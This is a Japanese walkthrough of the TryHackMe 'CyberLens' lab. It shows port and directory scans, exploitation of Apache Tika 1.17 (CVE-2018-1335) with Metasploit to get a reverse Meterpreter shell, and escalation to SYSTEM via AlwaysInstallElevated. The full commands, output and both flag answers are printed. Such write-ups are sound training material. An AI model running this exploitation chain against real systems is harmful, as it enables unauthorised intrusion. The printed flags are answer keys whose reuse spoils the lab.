【TryHackMe】CyberLens：Walkthrough

概要

TryHackMe「CyberLens」のWalkthroughです。

Task1

Q1.What is the user flag?

Hint.Sometimes exploits take a few tries before they are successful ;)

ポートスキャンを実行します。

$ nmap -Pn -sC -sV -A -T4 -p- 10.10.200.202 -oN nmap_result
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-07-20T21:59:23+00:00
|_ssl-date: 2024-07-20T21:59:32+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-07-19T21:37:13
|_Not valid after:  2025-01-18T21:37:13
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  tcpwrapped
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|_  Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-07-20T21:59:27
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 3s, deviation: 0s, median: 2s

ポートの稼働状況が分かりました。

80番ポートにアクセスします。

ディレクトリスキャンをします。

$ dirsearch -u http://cyberlens.thm/
[06:59:21] 301 -  232B  - /js  ->  http://cyberlens.thm/js/
[06:59:40] 200 -    6KB - /about.html
[07:00:09] 403 -  199B  - /cgi-bin/
[07:00:14] 200 -    5KB - /contact.html
[07:00:16] 301 -  233B  - /css  ->  http://cyberlens.thm/css/
[07:00:30] 301 -  236B  - /images  ->  http://cyberlens.thm/images/
[07:00:30] 200 -    2KB - /images/
[07:00:34] 200 -  384B  - /js/ 

Nmapのスキャンから61777でApache Tika 1.17が動作していると分かりました。
このバージョンの脆弱性情報を検索するとCVE-2018-1335が見つかりました。

MetasploitにPoCがあるのでこれを使用します。

モジュールをセットします。

msf6 > search tika 1.17

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript  2018-04-25       excellent  Yes    Apache Tika Header Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/apache_tika_jp2_jscript                                                                                      

msf6 > use 0

必要なオプションを設定します。

msf6 exploit(windows/http/apache_tika_jp2_jscript) > set rhosts cyberlens.thm
rhosts => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set rport 61777
rport => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set lhost 10.6.55.144
lhost => 10.6.55.144
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set srvport 8081
srvport => 8081

エクスプロイトを実行するとCyberLensアカウントでシェルを取得できました。

msf6 exploit(windows/http/apache_tika_jp2_jscript) > exploit

[*] Started reverse TCP handler on 10.6.55.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -   8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress -  97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.179.81:61777/meta
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Sending stage (176198 bytes) to 10.10.179.81
[*] Meterpreter session 1 opened (10.6.55.144:4444 -> 10.10.179.81:49866) at 2025-01-23 07:05:54 -0500

meterpreter > getuid
Server username: CYBERLENS\CyberLens

コマンドプロンプト移行します。

meterpreter > shell
Process 2844 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
cyberlens\cyberlens

C:\Users\CyberLens\Desktop\user.txtからユーザーフラグを入手できました。

C:\Users\CyberLens\Desktop>more user.txt
more user.txt
THM{T1k4-CV3-f0r-7h3-w1n}

A.THM{T1k4-CV3-f0r-7h3-w1n}

Q2.What is the admin flag?

Hint.RDP will make your life easier. If Remmina is not working, try this: rdesktop -u [user] -p [password] -N cyberlens.thm:3389

セッションをバックグラウンドにし、post/multi/recon/local_exploit_suggesterをセットします。

msf6 exploit(windows/http/apache_tika_jp2_jscript) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester  .                normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester                                                                                          

msf6 exploit(windows/http/apache_tika_jp2_jscript) > use 0

オプションを設定し実行するとexploit/windows/local/always_install_elevatedが使用できると分かりました。

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.179.81 - Collecting local exploits for x86/windows...
[*] 10.10.179.81 - 196 exploit checks are being tried...
[+] 10.10.179.81 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.179.81 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.179.81 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.179.81 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.179.81 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 41 / 41
[*] 10.10.179.81 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/always_install_elevated                  Yes                      The target is vulnerable.

モジュールをセットしオプションを設定します。

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/always_install_elevated
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/always_install_elevated) > set session 1
session => 1
msf6 exploit(windows/local/always_install_elevated) > set lhost 10.6.55.144
lhost => 10.6.55.144
msf6 exploit(windows/local/always_install_elevated) > set lport 1234
lport => 1234

実行すると管理者権限を取得できました。

msf6 exploit(windows/local/always_install_elevated) > run

[*] Started reverse TCP handler on 10.6.55.144:1234 
[*] Uploading the MSI to C:\Users\CYBERL~1\AppData\Local\Temp\1\eXJQvAHed.msi ...
[*] Executing MSI...
[*] Sending stage (176198 bytes) to 10.10.179.81
[+] Deleted C:\Users\CYBERL~1\AppData\Local\Temp\1\eXJQvAHed.msi
[*] Meterpreter session 2 opened (10.6.55.144:1234 -> 10.10.179.81:49871) at 2025-01-23 07:18:21 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

C:\Users\Administrator\Desktop\admin.txtからルートフラグを入手できました。

C:\Users\Administrator\Desktop>more admin.txt
more admin.txt
THM{3lev@t3D-4-pr1v35c!}

A.THM{3lev@t3D-4-pr1v35c!}